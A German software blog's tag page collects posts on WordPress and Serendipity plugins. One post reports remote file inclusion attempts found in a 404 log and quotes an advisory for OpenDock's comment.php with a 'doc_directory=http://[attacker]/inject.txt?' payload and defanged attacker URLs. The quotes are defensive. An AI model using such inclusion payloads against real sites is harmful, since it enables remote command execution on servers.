Software Guide

Die besten Tipps, Anleitungen und Downloads

Ihre Werbung auf Software Guide

Sie möchten in dieser Box oder an anderer Stelle dieser Webseiten eine Werbung schalten? Sehen Sie sich dazu am besten einfach mal die verschiedenen Möglichkeiten an.


Blog-Beiträge getaggt mit «plugin»

Mein Beitrag für den Plugin-Karneval

11. Mai 2007 von Michael | Wordpress

Plugin-KarnevalIch habe zwar mit WordPress Plugins bereits einen sehr umfangreichen und auch aktuellen Artikel, in dem ich viele hervorragende WordPress-Plugins vorstelle. Trotzdem sind nicht unbedingt all diese Plugins meine „Lieblings-Plugins“, daher stelle ich im Folgenden meine liebsten Plugins vor, die in keinem meiner Blogs fehlen und ich als Standard auch blind in jedem neuen Blog installieren werde.

Ich nehme natürlich mit dem vorliegenden Artikel ohne Wertung am Plugin-Karneval teil, d.h. ich selbst kann selbstverständlich keinen Preis gewinnen ;-)

Weiterlesen…


Blog-Karneval: Was sind Deine liebsten WordPress-Plugins?

5. Mai 2007 von Michael | Wordpress

Als ich eben endlich mal wieder den Artikel WordPress Plugins aktualisierte, kam mir die Idee, doch mal ein Blog-Karneval zu veranstalten.

Blog-Karneval: Was soll denn das sein?

Bei einem Blog-Karneval (siehe auch engl. Wikipedia) legt ein Blog als Veranstalter ein bestimmtes Thema fest (z.B.: Was ist Deine originellste Methode, eine Flasche Bier zu öffnen?) und bittet dann die lesenden Blogger darum, innerhalb eines vorgegebenen Zeitraums (z.B. 2 Wochen) einen Artikel zu diesem Thema im jew. eigenen Blog zu veröffentlichen. Danach listet der Veranstalter des Karnevals in einem neuen Blogbeitrag alle Artikel-Links und kommentiert diese entsprechend, erstellt Zusammenfassungen und/oder vergibt z.B. Prämien für die besten oder etwa originellsten Artikel. Der Fantasie sind dabei keine Grenzen gesetzt.
(Auszug aus dem Blog-Bekanntmachen-Artikel)

Zu diesem Blog-Karneval

Weiterlesen…


Serendipity-Plugins – Fremder RSS/OPML-Blogroll Feed

7. Februar 2007 von Farlion | Serendipity

Fast jedes Blog bietet heute Feeds an, die über Feedreader gelesen werden können und den Leser über Aktualisierungen informieren, ohne dass sie jedesmal das gewünschte Blog aufsuchen müssen.

Diese Feeds bieten aber auch die vorteilhafte Möglichkeit, die Artikel auszugsweise oder auch nur die Überschriften ausgewählter Blogs, auf der eigenen Seite anzuzeigen.
Bei Serendipity geht das ganz hervorragend mit folgendem Plugin:

RSS-Plugin

Das Plugin findet Ihr unter Seitenleisten-Plugins/Frontend: Externe Services.

Weiterlesen…


Simple Tagging Plugin veröffentlicht

4. Februar 2007 von Michael | Wordpress

Im Beitrag Tagging-Gezeter bei WordPress hatte ich meine Unzufriedenheit mit den bestehenden WordPress-Tagging-Plugins UTW und Jerome’s Keywords geäußert und angekündigt, selbst ein Plugin zu schreiben.

Nun ist es soweit und ich habe das neue WordPress-Plugin Simple Tagging veröffentlicht.

Für den einfachen Umstieg von UTW oder Jerome’s Keywords ist eine entsprechende Import-Möglichkeit integriert.

Alleinstellungsmerkmale des Plugins sind u.a.:

  • Type-Ahead, also automatische Vorschläge beim Taggen:
    Type Ahead
  • Related Tags, also die Funktionalität die Ihr vielleicht von del.icio.us kennt.
    Screenshot von del.icio.us:
    delicious-related

    So sieht die Umsetzung des Simple Tagging Plugin aus:
    Related Tags

Für Details schaut Ihr Euch am besten die Plugin-Seite an, dort sind auch noch weitere Screenshots.


Serendipity Plugins – das Coppermine-Plugin

23. Januar 2007 von Farlion | Serendipity

Serendipity Plugins – das Coppermine-Plugin

Heute widme ich meine Aufmerksamkeit dem Coppermine Plugin für Serendipity.

Zunächst ein paar Worte zu Coppermine. Coppermine ist eine Galeriesoftware für Websites und in PHP geschrieben. Es bietet Community-Funktionen wie der Registrierung verschiedener User, Kommentarmöglichkeit und, falls der entsprechende Admin es zulässt, dürfen User je nach Einstellung eigene Bilder in eigene Galerien im System hochladen. Coppermine unterstützt Kategorien und Alben, hat allerdings, wie fast alle modernen Systeme mit Kommentarfunktion, ebenfalls mit Spam zu kämpfen.
Auf die Installation und Konfiguration des Programms kann ich an dieser Stelle nicht eingehen, dazu würde es schon fast einer eigenen Serie bedürfen. Daher richtet sich dieser Artikel in erster Linie an Blogger, die schon über eine Coppermine Galerie verfügen oder sich mit dem Programm auskennen.
Wer es einfach nur ausprobieren möchte, kann es hier downloaden.

Aber jetzt zu Serendipity.
Für s9y gibt es zwei Coppermine Plugins. Das Eine ist ein Ereignis-Plugin „Coppermine Selector“ und ermöglicht die Einbindung von Bildern aus einer Coppermine Datenbank über die normale Serendipity-Mediendatenbank in Beiträge.

Weiterlesen…


Serendipity Plugins – Bildergalerie mit Picasa

9. Januar 2007 von Farlion | Serendipity

Im Dezember erreichten mich einige Mails von Bloggern, die Serendipity nutzen oder nutzen möchten und dafür eine komfortable Bildergalerie suchten. Ich habe mich also über die Feiertage einmal hingesetzt und die Möglichkeiten ausgelotet, die für diesen Zweck zur Verfügung stehen.
Das beste Ergebnis erzielte dabei eine Erstellung eines Albums mit Picasa, dem kostenlosen Bildverwaltungsprogramm von Google, und dem Picasa-Ereignis-Plugin für Serendipity.

Der erste Schritt sollte die Installation von Picasa auf dem heimischen Rechner sein. Ich empfehle dafür die aktuelle Version 2.0, aus dem Google-Picasabereich.

Weiterlesen…


Serendipity Fortsetzung

6. Januar 2007 von Farlion | Serendipity

Nach etwas stressigen Feiertagen und einem größeren gesundheitlichen Problem, geht es ab Montag weiter mit der Serendipity-Serie.

Am Montag gehe ich auf die Mediendatenbank und die verschiedenen Arten der Bildeinbindung in Artikel ein. Dabei kommen auch ein paar Plugins zur Sprache, die eine Einbindung aus externen Galerien wie Flickr oder Picasa erlauben oder, ebenfalls sehr praktisch, die Einbindung von Bildern aus einer eigenen Coppermine-Galerie.

So long, stay tuned!


Wer hat Lust auf WordPress-Plugin-Betatest?

5. Januar 2007 von Michael | Wordpress

Ausgangssituation

Wenn man in WordPress einen neuen Artikel schreibt und z.B. auf „Zwischenspeichern“ klickt, so wird die Seite neu geladen und am Ende der Seite wird in einem iFrame die komplette Webseite angezeigt, und diese enthält den bisherigen Artikeltext.
Einerseits ist das toll, weil man 1:1 sieht, wie der Artikel aussehen wird, ob Bilder richtig positioniert sind, etc.

Ein gravierender Nachteil ist jedoch, dass das Laden der Seite dadurch sehr viel Zeit in Anspruch nimmt, es dauert zum Teil „ewig“, bis das Admin-Interface aufgebaut ist, gerade wenn man im Blog externe Dinge wie Adense, Counter, 80×15-Buttons, YouTube-Videos, etc. von extern eingebunden hat.

Außerdem ist es zwar bei DSL-Flatrate egal, wenn immer die komplette Seite inkl. Header, Sidebar, Footer etc. geladen wird, aber es gibt immer noch einige Leute, die per ISDN oder sogar analog angebunden sind.

Weiterlesen…


WordPress: Attacken wegen aktivierter Permalinks

2. Januar 2007 von Michael | Wordpress

Erst kürzlich habe ich das WordPress-Plugin Log 404 installiert. Dieses Plugin zeichnet die 100 letzten 404-Fehler („Webseite nicht gefunden“) auf und ist damit eine prima Admin-Unterstützung, um tote Links aufzuspüren, die man ggf. umbiegen sollte, weil regelmäßig darauf zugegriffen wird.

Ich habe das Plugin ein paar Tagen im Einsatz und stelle nun immer wieder Massen-Zugriffe auf folgenden Pfad fest:

sw-guide.de/wordpress/lib_comment/comment.php?doc_directory=
hxxp://artelj.com/c.ar?
sw-guide.de/wordpress/lib_comment/comment.php?doc_directory=
hxxp://empzone.com/c.ar??

Bei Software Guide gibt es weder den Verzeichnispfad /wordpress/lib_comment/ noch gibt es dort diese comment.php. Googlen nach lib_comment/comment.php?doc_directory bringt aber einschlägige Ergebnisse zu Tage:

OpenDock Full Core contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to sw/lib_comment/comment.php not properly sanitizing user input supplied to the ‚doc_directory‘ variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.
(…)
Solution:
Currently, there are no known upgrades, patches, or workarounds available to correct this issue.
(…)
http://[target]/[OpenDockFullCore_Path]/sw/lib_comment/comment.php?doc_directory=
http://[attacker]/inject.txt?

Was bedeutet das jetzt?
Weiterlesen…


Aktualisierte WordPress-Plugin-Liste

29. Dezember 2006 von Michael | Wordpress

Im Rahmen des Software-Guide-Redesign habe ich auch die WordPress-Plugin-Liste aktualisiert, in der ich aus meiner Sicht sehr empfehlenswerte WordPress-Plugins liste und beschreibe.

Blog-Kategorien

Volltextsuche

Neueste Artikel

Neueste Kommentare

Neueste Trackbacks/Pingbacks

Andere Projekte

Blogparade

dient als zentrale Anlaufstelle für Blog-Paraden bzw. Blog-Karnevals und andere von BloggerInnen veranstaltete Aktionen.

Mediadaten

Feed-Statistik:
Feedburner

Software Guide gibt es seit Dezember 2005 und es werden durchschnittlich 3 Blog- Beiträge/Monat veröffentlicht. Die Themenschwerpunkte sind in der Tagcloud ersichtlich. Mehr Infos...

Links

 

Nach oben

Wordpress

© 2005-2020 Software Guide | ISSN 1864-9599